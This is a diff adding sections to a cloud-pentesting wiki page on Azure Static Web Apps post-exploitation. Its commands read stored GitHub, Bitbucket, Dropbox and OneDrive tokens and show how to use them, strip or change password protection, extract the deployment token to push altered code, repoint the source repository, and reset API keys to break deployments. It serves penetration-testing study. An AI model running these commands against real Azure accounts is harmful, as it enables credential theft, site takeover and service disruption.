static

src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md

@@ -33,6 +33,48 @@ az rest \
     }'
 ```
 
+### Read Configured Third Party Credentials
+
+As explained in the App Service section:
+
+{{#ref}}
+../az-privilege-escalation/az-app-services-privesc.md
+{{#endref}}
+
+Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one.
+
+```bash
+az rest --method GET \
+  --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
+```
+
+This command returns tokens for Github, Bitbucket, Dropbox and OneDrive.
+
+Here you have some command examples to check the tokens:
+
+```bash
+# GitHub – List Repositories
+curl -H "Authorization: token <token>" \
+     -H "Accept: application/vnd.github.v3+json" \
+     https://api.github.com/user/repos
+
+# Bitbucket – List Repositories
+curl -H "Authorization: Bearer <token>" \
+     -H "Accept: application/json" \
+     https://api.bitbucket.org/2.0/repositories
+
+# Dropbox – List Files in Root Folder
+curl -X POST https://api.dropboxapi.com/2/files/list_folder \
+     -H "Authorization: Bearer <token>" \
+     -H "Content-Type: application/json" \
+     --data '{"path": ""}'
+
+# OneDrive – List Files in Root Folder
+curl -H "Authorization: Bearer <token>" \
+     -H "Accept: application/json" \
+     https://graph.microsoft.com/v1.0/me/drive/root/children
+```
+
 ### Overwrite file - Overwrite routes, HTML, JS...
 
 It's possible to **overwritte a fie inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message.
@@ -64,6 +106,77 @@ curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
 ```
 
 
+### Microsoft.Web/staticSites/config/write
+
+With this permission, it's possible to **modify the password** protecting a static web app or even unprotect every environment by sending a request such as the following:
+
+```bash
+# Change password
+az rest --method put \
+--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
+--headers 'Content-Type=application/json' \
+--body '{
+    "name": "basicAuth",
+    "type": "Microsoft.Web/staticSites/basicAuth",
+    "properties": {
+        "password": "SuperPassword123.",
+        "secretUrl": "",
+        "applicableEnvironmentsMode": "AllEnvironments"
+    }
+}'
+
+# Remove the need of a password
+az rest --method put \
+--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
+--headers 'Content-Type=application/json' \
+--body '{
+    "name": "basicAuth",
+    "type": "Microsoft.Web/staticSites/basicAuth",
+    "properties": {
+        "secretUrl": "",
+        "applicableEnvironmentsMode": "SpecifiedEnvironments",
+        "secretState": "None"
+    }
+}'
+```
+
+### Microsoft.Web/staticSites/listSecrets/action
+
+This permission allows to get the **API key deployment token** for the static app.
+
+This token allows to deploy the app 
+
+```bash
+az rest --method POST \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
+```
+
+Then, in order to update an app you could run the following command. Note that this command was extracted checking **how to Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) works**, as it's the one Azure set by default ot use. So the image and paarements could change in the future.
+
+1. Download the repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (or any other repo you want to deploy) and run `cd react-basic`.
+2. Change the code you want to deploy
+3. Deploy it running (Remember to change the `<api-token>`):
+
+```bash
+docker run -it --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
+```
+
+### Microsoft.Web/staticSites/write
+
+With this permission it's possible to **change the source of the static web app to a different Github repository**, however, it won't be automatically provisioned as this must be done from a Github Action usually with the token that authorized the action as this token is not automatically updated inside the Githb secrets of the repo (it's just added automatically when the app is created).
+
+```bash
+az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main
+```
+
+### Microsoft.Web/staticSites/resetapikey/action
+
+With this permision it's possible to **reset the API key of the static web app** potentially DoSing the workflows that automatically deploy the app.
+
+```bash
+az rest --method POST \
+    --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
+```
 
 {{#include ../../../banners/hacktricks-training.md}}